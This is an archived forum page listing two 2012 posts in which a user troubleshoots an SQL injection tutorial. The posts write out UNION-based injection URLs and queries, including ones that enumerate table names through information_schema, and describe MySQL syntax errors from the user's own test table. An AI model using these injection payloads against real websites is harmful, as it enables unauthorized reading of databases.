This forum is in archive mode. You will not be able to post new content.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - l33tas

Pages: [1]
1
High Quality Tutorials / Re: SQL Injection
« on: February 06, 2012, 02:19:55 PM »
I get error: #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5,6,7,8,9,10 LIMIT 0, 30' at line 1
mb my MySQL db dont understand concat( table_name )? or all db must execute this function?
But if I try SELECT concat(table_name) FROM `tables` WHERE table_schema='test_table' its works fine..

2
High Quality Tutorials / Re: SQL Injection
« on: February 05, 2012, 08:12:58 PM »
I try this tutorial.. and have problem.
First: when you try write http://evilzone.org/index.php?id=17+ORDER+BY+5 or http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,3 you get nothing.. I solved this problem with ...?id=17' UNION ALL SELECT 1,2,3# but if you write in url in my case # dont works so I change it to %23. like ?id=17' UNION ALL SELECT 1,2,3%23.
Second: when I try this ?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=database() its dont work.. I try in MySQL and its gives this error: #1109 - Unknown table 'table_test' in information_schema
in my case Sql query is : SELECT * FROM `table_test` WHERE straipsnio_id = '1' UNION ALL SELECT 1,2,3,concat(table_name) FROM `information_schema.TABLES` WHERE table_schema=database(),5,6,7,8,9,10
any solution?

Pages: [1]


Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.